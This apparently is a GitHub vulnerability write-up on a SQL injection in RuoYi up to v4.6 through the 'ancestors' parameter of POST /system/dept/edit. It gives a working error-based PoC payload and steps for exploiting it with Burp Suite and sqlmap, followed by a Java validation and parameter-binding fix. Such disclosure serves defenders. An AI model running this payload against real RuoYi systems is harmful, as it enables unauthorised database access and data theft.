Ruoyiv4.6.md

File metadata and controls

24 lines (16 loc) · 1.28 KB

RuoYi up to v4.6 was discovered to contain a SQL injection vulnerability via the component /system/dept/edit

`${->updateDeptStatus->updateParentDeptStatus->updateDept->editSave`

Route: POST /system/dept/edit

Parameter: ancestors

Splice: `where dept_id in (${ancestors})`

PoC: `DeptName= 1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #`
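The splice above takes `ancestors` as raw text, so one way to close it is to accept only a comma-separated list of numeric ids and bind each id as a parameter. The following is an added example, not RuoYi's own code or its actual fix; the class `AncestorsCheck`, the helper `parseAncestors` and the collection name `ids` are hypothetical.

```java
import java.util.ArrayList;
import java.util.List;

public class AncestorsCheck {

    // Hypothetical helper: accept only a comma-separated list of
    // non-negative integer ids, e.g. "0,100,101". Anything else is rejected
    // before it can reach the SQL layer.
    static List<Long> parseAncestors(String ancestors) {
        if (ancestors == null || ancestors.isEmpty()) {
            throw new IllegalArgumentException("ancestors is empty");
        }
        List<Long> ids = new ArrayList<>();
        // limit -1 keeps trailing empty tokens, so "1," is rejected too
        for (String token : ancestors.split(",", -1)) {
            // 1 to 18 digits always fits in a long
            if (!token.matches("[0-9]{1,18}")) {
                throw new IllegalArgumentException("invalid dept id in ancestors");
            }
            ids.add(Long.parseLong(token));
        }
        return ids;
    }

    // The parsed ids can then be bound one by one in the mapper, for example
    // with MyBatis (assumed mapper fragment, collection name "ids"):
    //   where dept_id in
    //   <foreach collection="ids" item="id" open="(" separator="," close=")">
    //     #{id}
    //   </foreach>
    // instead of the spliced form: where dept_id in (${ancestors})

    public static void main(String[] args) {
        String[] samples = {
            "0,100,101",                                         // constructed benign value
            "0)or(extractvalue(1,concat((select user())))); #"   // ancestors value from the PoC above
        };
        for (String s : samples) {
            try {
                System.out.println("accepted " + parseAncestors(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```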

Find the corresponding function points according to the source code information.

Use the save function in this feature and find the packet that triggers the /system/dept/edit route.

Capture the packets using Burp Suite, save them, and then inject the PoC to get the database information.

Later you can save the packet and pass it to sqlmap to get more database information (closing the parentheses).